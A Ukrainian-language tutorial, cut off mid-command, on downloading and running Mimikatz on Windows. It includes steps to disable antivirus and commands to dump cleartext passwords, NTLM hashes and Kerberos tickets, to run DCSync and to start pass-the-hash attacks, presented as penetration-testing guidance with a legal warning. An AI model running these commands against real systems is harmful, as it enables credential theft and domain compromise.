Як встановити та використовувати Mimikatz в ОС Windows
Вступ
Mimikatz – це потужний інструмент пост-експлуатації, призначений для вилучення з пам’яті відкритих паролів, хешів, PIN-кодів і квитків Kerberos. Він широко використовується тестувальниками проникнення і фахівцями з безпеки для оцінки вразливостей систем. Цей посібник надає покроковий підхід до встановлення та використання Mimikatz для етичного тестування безпеки.
Попередження: Несанкціоноване використання Mimikatz є незаконним. Переконайтеся, що у вас є дозвіл, перш ніж використовувати його в будь-якому середовищі.
Необхідні умови
Перед встановленням Mimikatz переконайтеся, що у вас є наступне:
- Комп’ютер з Windows(Windows 7 , 10, 11 або Server версії)
- Привілеї адміністратора
- Захисник Windows та будь-яке антивірусне програмне забезпечення вимкнено (Mimikatz часто позначається як шкідливе програмне забезпечення)
Завантаження Mimikatz
Mimikatz – це інструмент з відкритим вихідним кодом, доступний на GitHub. Щоб завантажити його:
- Відкрийте веб-браузер і перейдіть на https://github.com/gentilkiwi/mimikatz.
- Натисніть ” Код ” > ” Завантажити ZIP“.
- Розпакуйте ZIP-архів до обраної вами папки.
Крім того, ви можете клонувати сховище за допомогою Git’а:
git clone https://github.com/gentilkiwi/mimikatz.git
Запуск Mimikatz
Оскільки Mimikatz вимагає адміністративних привілеїв, виконайте ці кроки, щоб запустити його:
- Відкрийте командний рядок або PowerShell від імені адміністратора.
- Перейдіть до папки, з якої ви розпакували Mimikatz:
cd шлях\до\mimikatz\x64 - Запустіть Mimikatz:
mimikatz.exe - Ви повинні побачити інтерфейс командного рядка з запрошенням
mimikatz #.
Основні команди Mimikatz
1. Перевірка системних привілеїв
Перш ніж витягувати облікові дані, перевірте, чи маєте ви достатні привілеї:
privilege::debug
Якщо все пройшло успішно, ви повинні побачити
Привілей '20' OK2. Вилучення паролів з пам’яті
Щоб витягти паролі з пам’яті у вигляді відкритого тексту, скористайтеся:
sekurlsa::logonpasswords
На екран буде виведено ім’я користувача, домен і паролі у відкритому вигляді, якщо вони доступні.
3. Дамп хешів NTLM
Хеші NTLM можуть бути використані для атак типу “перехоплення хешу”. Щоб витягти їх, виконайте:
lsadump::sam
Або, для віддалених систем:
lsadump::dcsync /domain:targetdomain.com /user:Administrator
4. Витяг квитків Kerberos
Для отримання квитків Kerberos з системи:
sekurlsa::tickets /export
Експортує файли
.kirbi, які можуть бути використані в атаках типу pass-the-ticket.
5. Pass-the-Hash атака
Для автентифікації за допомогою NTLM хешу замість пароля:
sekurlsa::pth /user:Administrator /domain:example.com /ntlm:


